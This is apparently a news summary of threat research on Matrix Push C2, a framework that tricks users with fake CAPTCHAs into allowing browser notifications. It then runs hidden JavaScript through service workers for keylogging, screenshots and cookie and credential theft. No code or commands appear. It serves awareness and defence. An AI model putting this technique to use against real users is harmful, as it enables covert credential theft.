A command-and-control (C2) framework identified as Matrix Push C2 has been observed utilizing web browser push notifications to conduct fileless attacks. This technique enables threat actors to establish persistent communication with a compromised browser without dropping malicious files onto the victim’s system.

The attack chain begins when a user is directed to a malicious website. On this site, a social engineering lure, such as a fake CAPTCHA verification, prompts the user to click ‘Allow’ on the browser’s native notification permission request. Granting this permission subscribes the browser to a push notification service controlled by the attacker.

Attack Mechanism and C2 Communication

Once the notification permission is granted, the Matrix Push C2 server can send covert messages directly to the victim’s browser. These push notifications are not displayed to the user. Instead, they contain commands and JavaScript payloads that are executed by the browser’s service worker in the background. This establishes a persistent command-and-control channel that remains active as long as the browser is running and the notification permission is enabled for the malicious domain.

The commands sent from the C2 server enable attackers to execute arbitrary JavaScript code within the context of the compromised browser. This allows for a range of malicious activities, including keylogging, capturing screenshots of the active browser window, and exfiltrating data such as cookies and credentials entered into web forms.

Fileless and Cross-Platform Nature

The Matrix Push C2 framework is inherently fileless because its malicious payloads execute directly in the browser’s memory. This approach circumvents many traditional endpoint detection and response (EDR) and antivirus (AV) solutions that primarily focus on scanning for malicious files on a disk. The entire operation resides within the browser’s legitimate processes.

This attack method is also cross-platform, affecting any operating system that runs a modern web browser supporting Push API standards, including Windows, macOS, Linux, and Android. The effectiveness of the attack depends on the browser’s functionality rather than the underlying operating system, broadening the potential target base for threat actors using this framework.

Source: https://thehackernews.com/2025/11/matrix-push-c2-uses-browser.html